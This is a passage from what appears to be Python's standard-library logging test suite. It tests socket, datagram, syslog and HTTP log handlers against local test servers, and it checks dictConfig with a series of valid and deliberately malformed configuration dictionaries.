self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
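# DatagramHandler reuses SocketHandler's pickled payload, including
# the 4-byte length prefix, even though each UDP packet already
# delimits exactly one record; handle_datagram() simply skips the
# prefix.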
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
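# The '<11>' prefix is the syslog priority: facility LOG_USER (1)
# shifted left by 3, plus severity LOG_ERR (3), i.e.
# (1 << 3) | 3 == 11, as computed by
# SysLogHandler.encodePriority('user', 'error').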
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except Exception:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no handlers are set on the logger
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config7 does not define compiler.parser but defines compiler.lexer,
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
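# config9a and config9b are incremental: with 'incremental': True,
# dictConfig only adjusts the levels of the already-configured
# handler and logger instead of replacing them.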
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
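# The '.' key maps attribute names to values that dictConfig sets
# directly on the constructed handler (test_config14_ok checks
# h.foo and h.terminator).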
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
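# out_of_order declares 'style': '$' but supplies a %-style format
# string, so dictConfig should raise ValueError (test_out_of_order);
# rewriting the format with ${...} placeholders makes the same
# config valid (test_out_of_order_with_dollar_style).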
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# config2 misspells the stream name; applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# config2a misspells a handler level; applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# config2b misspells a logger level; applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# config3 references an undefined formatter name; applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
